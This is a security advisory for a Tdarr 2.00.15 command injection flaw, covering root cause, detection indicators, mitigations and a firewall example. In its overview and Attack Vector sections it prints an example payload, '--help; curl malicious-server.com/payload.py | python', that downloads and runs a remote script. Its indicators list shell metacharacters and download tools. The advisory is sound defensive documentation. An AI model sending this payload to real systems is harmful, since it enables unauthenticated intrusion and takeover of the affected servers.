CVE-2022-50919: Tdarr RCE Vulnerability

CVE-2022-50919 Overview

CVE-2022-50919 is a critical unauthenticated remote code execution vulnerability affecting Tdarr 2.00.15, a popular media transcoding application. The vulnerability exists in the Help terminal component, which fails to properly sanitize user input, allowing attackers to inject and chain arbitrary commands. By exploiting the lack of input filtering, attackers can execute malicious payloads such as --help; curl .py | python to achieve remote code execution without any authentication requirements.

Critical Impact

Unauthenticated attackers can achieve full remote code execution on affected Tdarr installations, potentially leading to complete system compromise, data theft, or deployment of malware on media processing infrastructure.

Affected Products

• Tdarr version 2.00.15
• Tdarr installations with exposed Help terminal functionality
• Systems running Tdarr without network-level access controls

Discovery Timeline

• 2026-01-13 - CVE-2022-50919 published to NVD
• 2026-01-13 - Last updated in NVD database

Technical Details for CVE-2022-50919

Vulnerability Analysis

This command injection vulnerability (CWE-78) stems from improper neutralization of special elements used in OS commands within Tdarr's Help terminal interface. The application processes user-supplied input and passes it directly to a command interpreter without adequate sanitization or validation. This allows attackers to break out of the intended command context and execute arbitrary system commands.

The vulnerability is particularly severe because it requires no authentication, meaning any attacker with network access to a vulnerable Tdarr instance can exploit this flaw. The network-based attack vector with low attack complexity makes this vulnerability highly accessible to threat actors. Successful exploitation results in high impact to confidentiality, integrity, and availability, as attackers gain the ability to execute arbitrary code with the privileges of the Tdarr process.

Root Cause

The root cause of CVE-2022-50919 is the absence of input filtering and sanitization in the Help terminal functionality. When processing user input, the application fails to neutralize command separator characters (such as semicolons) and other shell metacharacters. This allows attackers to terminate the legitimate command and append their own malicious commands to be executed by the underlying operating system.

Attack Vector

The attack vector is network-based, targeting the Help terminal interface exposed by Tdarr. An attacker can craft a malicious request that includes command chaining characters followed by arbitrary commands. For example, by submitting input like --help; curl malicious-server.com/payload.py | python, the attacker can:

1. Complete or bypass the intended help command
2. Download a malicious Python script from a remote server
3. Execute the downloaded payload directly on the target system

The exploitation chain mechanism allows for sophisticated attacks including reverse shells, data exfiltration, and deployment of additional malware. Since no authentication is required, any exposed Tdarr instance becomes a potential target for automated exploitation attempts.

Detection Methods for CVE-2022-50919

Indicators of Compromise

• Unexpected outbound network connections from the Tdarr process to unknown external hosts
• Presence of command chaining characters (;, |, &&, ||) in Tdarr log files or request parameters
• Unusual child processes spawned by the Tdarr application, particularly shell interpreters or scripting engines
• Evidence of curl, wget, or similar download utilities being executed in the context of Tdarr operations

Detection Strategies

• Implement network monitoring to detect anomalous outbound connections from Tdarr server instances
• Deploy endpoint detection rules to identify command injection patterns targeting the Help terminal
• Configure application-level logging to capture and alert on suspicious input containing shell metacharacters
• Monitor for process execution anomalies where Tdarr spawns unexpected child processes

Monitoring Recommendations

• Enable verbose logging on Tdarr instances to capture all terminal input for forensic analysis
• Implement SIEM rules to correlate network traffic anomalies with Tdarr process activity
• Deploy file integrity monitoring on systems hosting Tdarr to detect unauthorized modifications
• Establish baseline behavior profiles for Tdarr processes to identify deviations indicative of exploitation

How to Mitigate CVE-2022-50919

Immediate Actions Required

• Restrict network access to Tdarr instances using firewall rules to limit exposure to trusted networks only
• Implement authentication mechanisms in front of Tdarr using a reverse proxy if not natively available
• Audit existing Tdarr installations for signs of compromise before applying patches
• Consider temporarily disabling the Help terminal functionality if operationally feasible

Patch Information

Users are advised to check the Tdarr Official Website for the latest security updates and patched versions. Review the VulnCheck Command Injection Advisory for detailed remediation guidance. Additional technical details and proof-of-concept information can be found at Exploit-DB #50822.

Workarounds

• Place Tdarr behind a VPN or internal network segment to prevent unauthorized external access
• Implement a Web Application Firewall (WAF) with rules to block command injection patterns
• Use network segmentation to isolate media processing infrastructure from critical systems
• Deploy application-layer access controls requiring authentication before accessing Tdarr functionality

# Example: Restrict Tdarr access using iptables (Linux)
# Allow access only from trusted internal network
iptables -A INPUT -p tcp --dport 8265 -s 192.168.1.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 8265 -j DROP